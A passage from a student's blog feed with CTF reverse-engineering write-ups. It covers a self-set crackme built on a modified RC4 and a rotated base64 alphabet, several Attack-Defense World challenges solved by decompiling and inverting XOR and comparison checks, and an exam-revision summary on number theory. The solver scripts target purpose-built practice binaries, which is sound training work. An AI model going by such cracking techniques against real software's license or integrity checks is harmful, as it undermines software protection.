</pre></td></tr></table></figure></div><h4 id="维吉尼亚"><a href="#维吉尼亚" class="headerlink" title="Vigenère"></a>Vigenère</h4><p>Vigenère source; those who know, know. I am not much good at setting crypto problems and have not studied them much, so that is all!</p><h3 id="0x04-总结"><a href="#0x04-总结" class="headerlink" title="0x04 Summary"></a>0x04 Summary</h3><p>Not much to say. I still feel too much of a noob, so I am only releasing the source of one problem; some of the juniors are probably already far above my level. I need to study and practise more. Also, the teacher says that in third year I cannot keep playing contests and solving challenges all the time, so I am planning to get into some real-world practice soon. Let's go!</p>]]></content>
<summary type="html">
<p>I really am a noob!!!</p>
</summary>
<category term="CTF" scheme="https://github.com/gha01un/gha01un.github.io/categories/CTF/"/>
<category term="RE" scheme="https://github.com/gha01un/gha01un.github.io/tags/RE/"/>
</entry>
<entry>
<title>Setting Problems for the Freshman Contest</title>
<link href="https://github.com/gha01un/gha01un.github.io/2020/11/29/%E6%96%B0%E7%94%9F%E8%B5%9B%E5%87%BA%E9%A2%98/"/>
<id>https://github.com/gha01un/gha01un.github.io/2020/11/29/%E6%96%B0%E7%94%9F%E8%B5%9B%E5%87%BA%E9%A2%98/</id>
<published>2020-11-29T08:23:43.921Z</published>
<updated>2020-11-30T09:46:13.263Z</updated>
<content type="html"><![CDATA[<p>I have been too busy lately and had not even written the write-up for my own problem. I have basically not slept from Thursday until now, Sunday. Just back in the dorm, so let me quickly write a write-up for the juniors!</p><a id="more"></a><h3 id="大三才学的密码学"><a href="#大三才学的密码学" class="headerlink" title="Crypto you only learn in third year"></a>Crypto you only learn in third year</h3><h4 id="题目描述"><a href="#题目描述" class="headerlink" title="Problem description"></a>Problem description</h4><p>hnqj was gaming again in today's cryptography lecture, and the teacher came down the aisle several times to see what he was really up to. Very quickly, the moment the teacher reached him, he flipped open the cryptography textbook and, in a flash, caught sight of a cipher called ***, and hnqj chuckled...</p><h4 id="分析"><a href="#分析" class="headerlink" title="Analysis"></a>Analysis</h4><p>First load it into IDA; there are a few functions to look at.</p><figure class="image-bubble"><img src="https://i.loli.net/2020/11/29/HWOvBibnxLfqyIN.png" alt="" title=""></figure><p>Start with sub_401760, which is just two simple for loops. Its body closely resembles RC4 key scheduling, so the function can be renamed RC4_INIT.</p><p>For reference, a blog post covering RC4 initialization and encryption code: <strong><a href="https://www.cnblogs.com/zibility/p/5404478.html" target="_blank" rel="noopener">https://www.cnblogs.com/zibility/p/5404478.html</a></strong></p><figure class="image-bubble"><img src="https://i.loli.net/2020/11/29/CRn8NdSHQP2FW9G.png" alt="" title=""></figure><figure class="image-bubble"><img src="https://i.loli.net/2020/11/29/uclQUfq7TLZWebK.png" alt="" title=""></figure><p>Next, sub_40188D. If you know RC4 you will recognise this as RC4 encryption, but the XOR step differs: the index used to pick the keystream byte has 24 added to it.</p><figure class="image-bubble"><img src="https://i.loli.net/2020/11/29/KbelOL7ZHaN6X5i.png" alt="" title=""></figure><figure class="image-bubble"><img src="https://i.loli.net/2020/11/29/Ch2Ypc93kLuOyit.png" alt="" title=""></figure><p>Finally, sub_401530, where a rather suspicious string stands out immediately.</p><figure class="image-bubble"><img src="https://i.loli.net/2020/11/29/J1wANtQiTXszLHa.png" alt="" title=""></figure><figure class="image-bubble"><img src="https://i.loli.net/2020/11/29/bRjUyw1W7FQ8tKc.png" alt="" title=""></figure><p>From experience this looks like base64. The algorithm is indeed a base64-like encoding, and that string is the base64 alphabet, only altered. The difference from real base64 is that sub_401711 shifts the alphabet: a cyclic rotation 24 positions to the left.</p><figure class="image-bubble"><img src="https://i.loli.net/2020/11/29/vwT3Ux8EHzABjpM.png" alt="" title=""></figure><figure class="image-bubble"><img src="https://i.loli.net/2020/11/29/zQa2LfWOxMrEm3G.png" alt="" title=""></figure><p>With each function analysed, the logic of main is clear.</p><p>The program first encrypts the input with the RC4 variant, then encodes it with the base64 variant, and compares the result with the ciphertext B4QrGVzkpZVeHssap5HEgWfSQQ0zmMAA.</p><figure class="image-bubble"><img src="https://i.loli.net/2020/11/29/D1XSWjl68xqFzep.png" alt="" title=""></figure><h4 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h4><div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true" data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre>
#coding:utf-8
import re
def RC4_INIT(key):
    # key-scheduling algorithm (KSA), identical to standard RC4
    key = list(key)
    for i in range(len(key)):
        key[i] = ord(key[i])
    k = [0 for i in range(256)]
    s = [0 for i in range(256)]
    j = 0
    length = len(key)
    for i in range(256):
        s[i] = i
        k[i] = key[i % length]
    for i in range(256):
        j = (j + s[i] + k[i]) % 256
        s[i], s[j] = s[j], s[i]
    return s
def RC4_DECRYPTE(Data, key):
    # PRGA; since XOR is its own inverse this decrypts as well as encrypts
    Data = list(Data)
    for i in range(len(Data)):
        Data[i] = ord(Data[i])
    s = RC4_INIT(key)
    i = j = t = 0
    length = len(Data)
    for k in range(length):
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        t = (s[i] + s[j] + 24) % 256  # differs from standard RC4: extra offset of 24
        Data[k] = Data[k] ^ s[t]
    return Data
def base64_encode(s, dictionary):
    r = ""
    p = ""
    c = len(s) % 3

    if (c > 0):
        for i in range(c, 3):
            p += '='
            s += "\0"

    for c in range(0, len(s), 3):
        n = (ord(s[c]) << 16) + (ord(s[c+1]) << 8) + (ord(s[c+2]))
        n = [(n >> 18) & 0x3F, (n >> 12) & 0x3F, (n >> 6) & 0x3F, n & 0x3F]
        r += dictionary[n[0]] + dictionary[n[1]] + dictionary[n[2]] + dictionary[n[3]]
    return r[0:len(r) - len(p)] + p

def base64_decode(s, dictionary):
    base64inv = {}
    for i in range(len(dictionary)):
        base64inv[dictionary[i]] = i

    s = s.replace("\n", "")
    if not re.match(r"^([{alphabet}]{{4}})*([{alphabet}]{{3}}=|[{alphabet}]{{2}}==)?$".format(alphabet = dictionary), s):
        raise ValueError("Invalid input: {}".format(s))

    if len(s) == 0:
        return ""
    p = "" if (s[-1] != "=") else "AA" if (len(s) > 1 and s[-2] == "=") else "A"
    r = ""
    s = s[0:len(s) - len(p)] + p
    for c in range(0, len(s), 4):
        n = (base64inv[s[c]] << 18) + (base64inv[s[c+1]] << 12) + (base64inv[s[c+2]] << 6) + base64inv[s[c+3]]
        r += chr((n >> 16) & 255) + chr((n >> 8) & 255) + chr(n & 255)
    return r[0:len(r) - len(p)]
def test_base64():
    # sanity check of the encoder/decoder against the standard library with the standard alphabet
    import base64
    import string
    import random
    dictionary = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    def random_string(length):
        return ''.join(random.choice(string.ascii_letters) for m in range(length))
    for i in range(100):
        s = random_string(i)
        encoded = base64_encode(s, dictionary)
        assert(encoded == base64.b64encode(s.encode()).decode())
        assert(s == base64_decode(encoded, dictionary))

if __name__ == "__main__":

    dictionary = 'Mq/J0tTI1RkSimKFwnczo2VXpPshL4_UgjH6DEG39yr+aOYWCfBeN5lb8v7QdxZuA'  # the alphabet after the left rotation
    Data = base64_decode("B4QrGVzkpZVeHssap5HEgWfSQQ0zmMAA", dictionary)
    key = 'Please input the flag:\n'
    flag = RC4_DECRYPTE(Data, key)
    for i in flag:
        print(chr(i), end='')
    print()
</pre></td></tr></table></figure></div><h4 id="总结"><a href="#总结" class="headerlink" title="Summary"></a>Summary</h4><p>More information about the problems I set will be uploaded to the blog over the next few days: <strong><a href="https://gha01un.github.io/" target="_blank" rel="noopener">https://gha01un.github.io/</a></strong></p><p>Everyone is welcome to drop by!</p>]]></content>
<summary type="html">
<p>I have been too busy lately and had not even written the write-up for my own problem. I have basically not slept from Thursday until now, Sunday. Just back in the dorm, so let me quickly write a write-up for the juniors!</p>
</summary>
<category term="CTF" scheme="https://github.com/gha01un/gha01un.github.io/categories/CTF/"/>
<category term="RE" scheme="https://github.com/gha01un/gha01un.github.io/tags/RE/"/>
</entry>
<entry>
<title>Mathematical Foundations of Information Security: Revision Summary</title>
<link href="https://github.com/gha01un/gha01un.github.io/2020/11/25/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E6%95%B0%E5%AD%A6%E5%9F%BA%E7%A1%80%E5%A4%8D%E4%B9%A0%E6%80%BB%E7%BB%93/"/>
<id>https://github.com/gha01un/gha01un.github.io/2020/11/25/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E6%95%B0%E5%AD%A6%E5%9F%BA%E7%A1%80%E5%A4%8D%E4%B9%A0%E6%80%BB%E7%BB%93/</id>
<published>2020-11-25T10:20:42.845Z</published>
<updated>2020-11-25T10:28:36.071Z</updated>
<content type="html"><![CDATA[<p>I cannot study any more. I have been down for a week and my mood is bad, so I will post something every day just to feel like I exist. Sob, it is so hard.</p><a id="more"></a><h4 id="第1章-整数"><a href="#第1章-整数" class="headerlink" title="Chapter 1 Integers"></a><strong>Chapter 1: Integers</strong></h4><p><strong>Key points:</strong></p><p>1. Concept and properties of divisibility</p><p>2. Euclidean division</p><p>3. Trivial primality testing</p><p>4. Base-b representation; be able to convert between bases</p><p>5. Definition and properties of the greatest common divisor</p><p>6. Computing the gcd with the extended Euclidean algorithm</p><p>7. Computing the least common multiple and its properties</p><p>8. Applications of the fundamental theorem of arithmetic; know Theorem 1.6.4 on page 45</p><p><strong>Exam question types:</strong></p><p>1. Proving divisibility (method 1: properties of divisibility; method 2: properties of congruences)</p><p>2. Proofs and tests concerning primes</p><p>3. Finding the gcd (Euclidean algorithm)</p><p>4. Finding s, t such that sa+tb=1 (back-substitution or the tabular method)</p><p>5. Representation of integers</p><h4 id="第2章-同余"><a href="#第2章-同余" class="headerlink" title="Chapter 2 Congruences"></a><strong>Chapter 2: Congruences</strong></h4><p><strong>Key points:</strong></p><p>1. Concept, properties and testing of congruence</p><p>2. Residue classes, complete residue systems, reduced residue classes and reduced residue systems: concepts and differences; be able to write them out for a concrete modulus</p><p>3. Properties of complete and reduced residue systems for two and for several moduli</p><p>4. Euler's theorem, Fermat's theorem, Wilson's theorem</p><p>5. Modular repeated squaring (the teacher said you need not follow these exact steps, but you must be able to compute what a is congruent to modulo m for concrete a and m, and get the result right)</p><p><strong>Exam question types:</strong></p><p>1. Residue classes and systems; most likely you are given a concrete number and asked to write out the residue classes, a complete residue system, the reduced residue classes and a reduced residue system</p><p>2. Modular exponentiation, i.e. what a^p is congruent to modulo m; make good use of Euler's theorem</p><p>3. Using properties of congruences to prove divisibility</p><p>4. Proofs of properties of congruences</p><p>5. For a^p mod m with a large m, split the congruence into a system of congruences, compute each separately, then combine with the Chinese remainder theorem</p><h4 id="第3章-同余式"><a href="#第3章-同余式" class="headerlink" title="Chapter 3 Congruence equations"></a><strong>Chapter 3: Congruence equations</strong></h4><p><strong>Key points (also exam points):</strong></p><p>1. Solving linear congruences</p><p>2. Solving quadratic congruences (via the Chinese remainder theorem)</p><p>3. Solving higher-degree congruences</p><p>4. Lifting solutions of higher-degree congruences (modulus of the form mn)</p><p>5. Simplifying congruences modulo a prime</p><p>6. Bounding the number of solutions of congruences modulo a prime</p><h4 id="第4章-二次剩余"><a href="#第4章-二次剩余" class="headerlink" title="Chapter 4 Quadratic residues"></a><strong>Chapter 4: Quadratic residues</strong></h4><p><strong>Key points:</strong></p><p>1. Quadratic residues and non-residues modulo an odd prime</p><p>2. Definition of the Legendre symbol and its computational properties</p><p>3. Quadratic reciprocity</p><p>4. The Jacobi symbol (the modulus no longer has to be an odd prime; given a quadratic congruence, the computational rules of the Legendre symbol, including reciprocity, decide directly whether it is solvable. To find the actual number of solutions, however, the congruence must still be split into a system of congruences with odd moduli, and the number of solutions is the product of the counts for each congruence)</p><p><strong>Exam question types:</strong></p><p>1. Finding quadratic residues</p><p>2. Deciding whether a number is a quadratic residue, i.e. whether a quadratic congruence is solvable</p><p>3. Finding all points on an elliptic curve</p><p>4. Determining the number of solutions of a quadratic congruence</p><p>5. Finding all p satisfying a given value of (a/p)</p><h4 id="第5章-原根与指标"><a href="#第5章-原根与指标" class="headerlink" title="Chapter 5 Primitive roots and indices"></a><strong>Chapter 5: Primitive roots and indices</strong></h4><p><strong>Key points:</strong></p><p>1. Definition and properties of the order of an element</p><p>2. Definition and properties of primitive roots</p><p>3. Definition and properties of indices (discrete logarithms)</p><p><strong>Exam question types:</strong></p><p>1. Finding the order of an element (possibly using its properties)</p><p>2. Finding primitive roots</p><p>① modulo p</p><p>② modulo p^2</p><p>③ modulo p^α</p><p>④ modulo 2p^α</p><p>These build on one another; solve from ① to ④ in turn</p><p>3. Finding indices</p><p>4. Solving higher-degree congruences with indices, as in Example 5.3.6 on page 195: first decide whether a solution exists, then solve using the index table (provided in the exam).</p><h4 id="第6章-素性检验"><a href="#第6章-素性检验" class="headerlink" title="Chapter 6 Primality testing"></a><strong>Chapter 6: Primality testing</strong></h4><p><strong>Key points:</strong></p><p>1. Definition of pseudoprimes (plus Carmichael numbers)</p><p>2. Definition of Euler pseudoprimes</p><p>3. Definition of strong pseudoprimes</p><p><strong>Exam question types:</strong></p><p>1. Given a number, use the definition to decide whether it is the corresponding kind of pseudoprime</p><p>Other exam points: not sure</p>]]></content>
<summary type="html">
<p>I cannot study any more. I have been down for a week and my mood is bad, so I will post something every day just to feel like I exist. Sob, it is so hard.</p>
</summary>
<category term="Study" scheme="https://github.com/gha01un/gha01un.github.io/categories/Study/"/>
<category term="AI" scheme="https://github.com/gha01un/gha01un.github.io/tags/AI/"/>
</entry>
<entry>
<title>Attack-Defense World: Expert Area</title>
<link href="https://github.com/gha01un/gha01un.github.io/2020/11/24/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E9%AB%98%E6%89%8B/"/>
<id>https://github.com/gha01un/gha01un.github.io/2020/11/24/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E9%AB%98%E6%89%8B/</id>
<published>2020-11-24T07:22:22.351Z</published>
<updated>2021-01-11T01:41:52.124Z</updated>
<content type="html"><![CDATA[<h2 id="实验课写写之前做过的题叭"><a href="#实验课写写之前做过的题叭" class="headerlink" title="实验课写写之前做过的题叭"></a>实验课写写之前做过的题叭</h2><a id="more"></a><h3 id="Guess-the-Number"><a href="#Guess-the-Number" class="headerlink" title="Guess-the-Number"></a>Guess-the-Number</h3><p>下载文件,得到一个jar包,解压得到一个class文件</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/jWL524KdeCTRwni.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>这个地方要用到一个反编译插件jadclipse,得到guess.class文件的源代码如下(全部)。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/kPHIT1fVEdhBmjR.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p><code>if (my_number / 5 == guess_number) {//可求得guess_number为309137378,</code></p><p>输入命令<code>java -jar guess.jar 309137378</code></p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/iKVrkQPzUdoWZXL.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="Shuffle"><a href="#Shuffle" class="headerlink" title="Shuffle"></a>Shuffle</h3><p>查看是32位文件,拖入ida查看,F5</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/o73en4NQlXJKduj.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>按R查看字符串得到flag</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/kQxyqU8Ol7Dedj3.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="re-for-50-plz-50"><a href="#re-for-50-plz-50" class="headerlink" title="re-for-50-plz-50"></a>re-for-50-plz-50</h3><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/L4R8JyFSEmslawI.png" alt="" title=""> </div> 
<div class="image-caption"></div> </figure><p>Opening it in IDA shows that this is MIPS code. I had planned to install RetDec, but ended up brushing up on MIPS instructions instead: <a href="https://www.cnblogs.com/thoupin/p/4018455.html" target="_blank" rel="noopener">https://www.cnblogs.com/thoupin/p/4018455.html</a></p><p>The part that matters for the analysis</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="C:\Users\大仑子\AppData\Roaming\Typora\typora-user-images\image-20201124150720708.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>This is simply a byte-wise XOR of the stored string with the constant 0x37; since XOR is its own inverse, applying the same operation again recovers the flag:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># encoded string taken from the binary's data section</span></span><br><span class="line">str1 = <span class="string">'cbtcqLUBChERV[[Nh@_X^D]X_YPV[CJ'</span></span><br><span class="line"></span><br><span class="line">flag = <span class="string">''</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># same key as in the MIPS code; XOR twice gives the plaintext back</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> str1:</span><br><span class="line">    flag += chr(ord(i)^<span class="number">0x37</span>)</span><br><span class="line"></span><br><span class="line">print(flag)</span><br></pre></td></tr></table></figure></div><h3 id="dmd-50"><a href="#dmd-50" class="headerlink" title="dmd-50"></a>dmd-50</h3><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/S1OKf6AX739JnDe.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>The file is a 64-bit ELF, so it has to be run in a Linux environment.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/xcFZECIYepgwrq8.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>It prompts for the correct key.</p><p>Pressing F5 for the pseudocode shows that the input is hashed with MD5 (a one-way hash, not reversible encryption) before being compared.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/Q2fPaKWUVp8Hxut.png" alt="" 
title=""> </div> <div class="image-caption"></div> </figure><p>Reading on, the if condition gives the expected digest, i.e. the MD5 value the key has to hash to.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/CEZVzDKiBpk3mos.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Write a script to recover the key from that digest (since MD5 cannot be inverted, this means hashing candidate keys and comparing digests rather than decrypting anything).</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/2PISa9k3FitUTbe.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="parallel-comparator-200"><a href="#parallel-comparator-200" class="headerlink" title="parallel-comparator-200"></a>parallel-comparator-200</h3><p>The challenge's C source file</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdlib.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><pthread.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> FLAG_LEN 20</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> * <span class="title">checking</span><span class="params">(<span class="keyword">void</span> *arg)</span> </span>{</span><br><span class="line"> <span class="keyword">char</span> *result = <span class="built_in">malloc</span>(<span class="keyword">sizeof</span>(<span class="keyword">char</span>));</span><br><span class="line"> <span class="keyword">char</span> *argument = (<span class="keyword">char</span> 
*)arg;</span><br><span class="line"> *result = (argument[<span class="number">0</span>]+argument[<span class="number">1</span>]) ^ argument[<span class="number">2</span>];<span class="comment">// argument[0] is first_letter (97..122), [1] the fixed difference, [2] the input byte</span></span><br><span class="line"> <span class="keyword">return</span> result;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">highly_optimized_parallel_comparsion</span><span class="params">(<span class="keyword">char</span> *user_string)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">int</span> initialization_number;</span><br><span class="line"> <span class="keyword">int</span> i;</span><br><span class="line"> <span class="keyword">char</span> generated_string[FLAG_LEN + <span class="number">1</span>];</span><br><span class="line"> generated_string[FLAG_LEN] = <span class="string">'\0'</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">while</span> ((initialization_number = <span class="built_in">random</span>()) >= <span class="number">64</span>);<span class="comment">// looks random, but random() is never seeded, so the first value below 64 is always the same: 37</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">int</span> first_letter;</span><br><span class="line"> first_letter = (initialization_number % <span class="number">26</span>) + <span class="number">97</span>;<span class="comment">// 97..122, i.e. 'a'..'z'; 37 % 26 + 97 = 108 = 'l'</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">pthread_t</span> thread[FLAG_LEN];</span><br><span class="line"> <span class="keyword">char</span> differences[FLAG_LEN] = {<span class="number">0</span>, <span class="number">9</span>, <span class="number">-9</span>, <span class="number">-1</span>, <span class="number">13</span>, <span class="number">-13</span>, <span class="number">-4</span>, <span 
class="number">-11</span>, <span class="number">-9</span>, <span class="number">-1</span>, <span class="number">-7</span>, <span class="number">6</span>, <span class="number">-13</span>, <span class="number">13</span>, <span class="number">3</span>, <span class="number">9</span>, <span class="number">-13</span>, <span class="number">-11</span>, <span class="number">6</span>, <span class="number">-7</span>};</span><br><span class="line"> <span class="keyword">char</span> *arguments[<span class="number">20</span>];</span><br><span class="line"> <span class="comment">// one thread per character; each thread gets a 3-byte argument:</span></span><br><span class="line"> <span class="keyword">for</span> (i = <span class="number">0</span>; i < FLAG_LEN; i++) {</span><br><span class="line"> arguments[i] = (<span class="keyword">char</span> *)<span class="built_in">malloc</span>(<span class="number">3</span>*<span class="keyword">sizeof</span>(<span class="keyword">char</span>));</span><br><span class="line"> arguments[i][<span class="number">0</span>] = first_letter;<span class="comment">// the "random" first letter (fixed in practice)</span></span><br><span class="line"> arguments[i][<span class="number">1</span>] = differences[i];<span class="comment">// the fixed difference for this position</span></span><br><span class="line"> arguments[i][<span class="number">2</span>] = user_string[i];<span class="comment">// the user's input byte</span></span><br><span class="line"></span><br><span class="line"> pthread_create((<span class="keyword">pthread_t</span>*)(thread+i), <span class="literal">NULL</span>, checking, arguments[i]);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">void</span> *result;</span><br><span class="line"> <span class="keyword">int</span> just_a_string[FLAG_LEN] = {<span class="number">115</span>, <span class="number">116</span>, <span class="number">114</span>, <span class="number">97</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">101</span>, <span class="number">95</span>, <span 
class="number">115</span>, <span class="number">116</span>, <span class="number">114</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">95</span>, <span class="number">105</span>, <span class="number">116</span>, <span class="number">95</span>, <span class="number">105</span>, <span class="number">115</span>};</span><br><span class="line"> <span class="keyword">for</span> (i = <span class="number">0</span>; i < FLAG_LEN; i++) {</span><br><span class="line"> pthread_join(*(thread+i), &result);</span><br><span class="line"> generated_string[i] = *(<span class="keyword">char</span> *)result + just_a_string[i];</span><br><span class="line"> <span class="built_in">free</span>(result);</span><br><span class="line"> <span class="built_in">free</span>(arguments[i]);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">int</span> is_ok = <span class="number">1</span>;</span><br><span class="line"> <span class="keyword">for</span> (i = <span class="number">0</span>; i < FLAG_LEN; i++) {</span><br><span class="line"> <span class="keyword">if</span> (generated_string[i] != just_a_string[i])</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">char</span> *user_string = (<span class="keyword">char</span> *)<span class="built_in">calloc</span>(FLAG_LEN+<span class="number">1</span>, <span 
class="keyword">sizeof</span>(<span class="keyword">char</span>));</span><br><span class="line"> fgets(user_string, FLAG_LEN+<span class="number">1</span>, <span class="built_in">stdin</span>);</span><br><span class="line"> <span class="keyword">int</span> is_ok = highly_optimized_parallel_comparsion(user_string);</span><br><span class="line"> <span class="keyword">if</span> (is_ok)</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"You win!\n"</span>);</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"Wrong!\n"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>On a first skim, <code>pthread_t</code>, <code>pthread_join</code> and <code>pthread_create</code> were unfamiliar, so I looked them up and found the following.</p><p><code>pthread_t</code> (this is the pthreads-win32 definition; glibc declares it as <code>unsigned long int</code>; either way it is an opaque thread handle)</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">unsigned</span> __int64 <span class="keyword">uintptr_t</span>;</span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">uintptr_t</span> <span class="keyword">pthread_t</span>;</span><br></pre></td></tr></table></figure></div><p><code>pthread_create</code>: creates a new thread; returns <code>0</code> on success, otherwise an error number.</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">pthread_create</span><span class="params">(<span class="keyword">pthread_t</span> 
*thread, <span class="keyword">const</span> <span class="keyword">pthread_attr_t</span> *attr,<span class="keyword">void</span> *(*start_routine)(<span class="keyword">void</span>*), <span class="keyword">void</span> *arg)</span></span>;</span><br></pre></td></tr></table></figure></div><ul><li><code>pthread_t *thread</code> receives the identifier of the new thread</li><li><code>pthread_attr_t *attr</code> sets the thread attributes (NULL means the defaults)</li><li><code>void *(*start_routine)(void*)</code> is the function the new thread starts executing</li><li><code>void *arg</code> is the argument passed to that function</li></ul><p><code>pthread_join</code>: waits for a thread to terminate; returns <code>0</code> on success, otherwise an error number.</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">pthread_join</span><span class="params">(<span class="keyword">pthread_t</span> thread, <span class="keyword">void</span> **value_ptr)</span></span>;</span><br></pre></td></tr></table></figure></div><ul><li><code>pthread_t thread</code> is the thread to wait for</li><li><code>void **value_ptr</code> receives the pointer the thread returned</li></ul><p>With that background the check is easy to read. For each index i, checking() runs in its own thread and computes (first_letter + differences[i]) ^ user_string[i], where first_letter is fixed at 108 (random() is never seeded; the value was confirmed by debugging). The main thread adds each thread's result to just_a_string[i] and then requires generated_string[i] == just_a_string[i], so the check passes only when every thread returns 0, that is, when user_string[i] == first_letter + differences[i] for all i. In code:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="comment">// per character i: the thread result must be 0 for the comparison to hold</span></span><br><span class="line">((first_letter + differences[i]) ^ user_string[i]) + just_a_string[i] == just_a_string[i]</span><br><span class="line"><span class="comment">// which is equivalent to</span></span><br><span class="line">user_string[i] == first_letter + differences[i]</span><br></pre></td></tr></table></figure></div><p>Script:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span 
class="comment"># differences[] from the binary; first_letter was observed to be 108</span></span><br><span class="line">a = [<span class="number">0</span>, <span class="number">9</span>, <span class="number">-9</span>, <span class="number">-1</span>, <span class="number">13</span>, <span class="number">-13</span>, <span class="number">-4</span>, <span class="number">-11</span>, <span class="number">-9</span>, <span class="number">-1</span>, <span class="number">-7</span>, <span class="number">6</span>, <span class="number">-13</span>, <span class="number">13</span>, <span class="number">3</span>, <span class="number">9</span>, <span class="number">-13</span>, <span class="number">-11</span>, <span class="number">6</span>, <span class="number">-7</span>]</span><br><span class="line">flag = <span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(a)):</span><br><span class="line">    <span class="comment"># brute-force the input byte j+1 for which the thread result is 0</span></span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">127</span>):</span><br><span class="line">        <span class="keyword">if</span> ((a[i]+<span class="number">108</span>) ^ (j+<span class="number">1</span>)) == <span class="number">0</span>:</span><br><span class="line">            flag += chr(j+<span class="number">1</span>)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">print(flag)</span><br></pre></td></tr></table></figure></div><h3 id="secret-galaxy-300"><a 